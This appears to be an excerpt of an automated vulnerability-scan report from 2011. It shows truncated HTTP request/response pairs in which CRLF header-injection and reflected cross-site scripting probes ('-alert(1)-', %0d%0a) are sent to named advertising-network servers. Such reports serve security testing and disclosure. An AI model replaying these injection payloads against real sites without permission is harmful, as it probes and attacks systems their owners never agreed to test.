POST /managing/optout_results Host: www.networkadvertising User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: __utma=1.519244467 Content-Type: application/x-www-form Content-Length: 873 optThis=1&optThis=2 ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 17:18:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 17:18:56 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
POST /managing/optout_results Host: www.networkadvertising User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: __utma=1.519244467 Content-Type: application/x-www-form Content-Length: 873 optThis=1&optThis=2 ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 17:18:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 17:18:56 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adsc/d927907/35/43624044 |
GET /adsc/d927907/35/43624044 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.answerology Cookie: ES=9b8a5%0d%0a91d788bd1b; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:30:03 GMT Server: Apache-AdvancedExtra X-Powered-By: PHP/4.3.8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: a229.dl Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 17:30:02 GMT; path=/; domain=.questionmarket Set-Cookie: CS1=43208740-5-1_845473-1 Set-Cookie: ES=9b8a5 91d788bd1b_927907-9E[|M-0; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif GIF89a.............!..... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /ucm/UCMController?dtm Host: login.dotomi.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: DotomiUser=230600846 |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:24:55 GMT X-Name: dmc-s02 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:24:55 GMT; Path=/ Location: http://login.dotomi.com abef94bf3d9 Content-Type: text/html Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http://optout Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: cc=optout |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:45 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:52 GMT Location: http://optout.crwdcntrl c8452c8724b&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=71d66%0d%0a93e8c521907 HTTP/1.1 Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:24 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:31 GMT Location: http://optout.crwdcntrl 93e8c521907&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http://optout Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:33 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:40 GMT Location: http://optout.crwdcntrl ae1dd9efdab=1&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA12fa62'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 462 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:36 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 462 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:37 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 466 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:34 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 463 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:20 GMT Connection: close Set-Cookie: dc=sea-dc; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:48:03 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:48:03 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 475 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:48:01 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 472 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:47:59 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:29 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:30 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:28 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 468 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:26 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:43 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:44 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:41 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 468 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:40 GMT Connection: close Set-Cookie: dc=sea-dc90af58da957 Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadjaac19'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7362 Date: Sat, 17 Sep 2011 16:25:34 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadj/bzo.454.61DCBAA1d936d'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 16:25:35 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 16:25:35 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
